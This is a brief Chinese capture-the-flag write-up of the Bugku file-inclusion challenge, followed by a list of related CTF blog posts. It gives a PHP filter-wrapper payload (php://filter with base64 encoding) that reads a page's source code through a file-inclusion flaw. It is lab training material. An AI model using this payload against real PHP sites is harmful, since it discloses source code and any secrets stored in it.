bugku--文件包含

点击

访问一下index.php

页面报错

既然是文件包含就可以想到php伪协议

这里我们需要访问本地文件系统 构造我们的payload

?file=php://filter/read=convert.base64-encode/resource=index.php

base64解码

得到我们的flag 提交就好啦

?file=php://filter/read=convert.base64-encode/resource=index.php

?file=php://filter/read=convert.base64-encode/resource=index.php

file 访问本地系统,以php的形式,过滤读取 以base64的形式输出出来index.php里面的内容

相关推荐
H轨迹H16 分钟前
BUUCTF刷题-Web方向1~5wp
网络安全·渗透测试·ctf·buuctf·web漏洞
YesYoung!21 小时前
pikachu靶场-敏感信息泄露概述
web安全·网络安全·ctf
希望奇迹很安静2 天前
[极客大挑战 2019]PHP
开发语言·学习·web安全·php·ctf·buuctf
希望奇迹很安静3 天前
[HCTF 2018]WarmUp
学习·web安全·ctf·buuctf
Z3r4y5 天前
【Web】2025西湖论剑·中国杭州网络安全安全技能大赛题解(全)
web安全·ctf·wp·西湖论剑
希望奇迹很安静6 天前
nssctf_WEB部分题解
学习·web安全·ctf
小彭爱学习7 天前
php审计1-extract函数变量覆盖
web安全·网络安全·php·ctf·代码审计·extract
摸鱼也很难16 天前
php反序列化 && ctf例题演示 框架安全(TP,Yii,Laravel)&& phpggc生成框架利用pop
php·ctf·php反序列化·审计·ctf web题目
Mr_Fmnwon17 天前
【我的 PWN 学习手札】IO_FILE 之 FSOP
pwn·ctf·io_file
SRC_BLUE_1719 天前
攻防世界 - Misc - Level 1 | Banmabanma
网络安全·ctf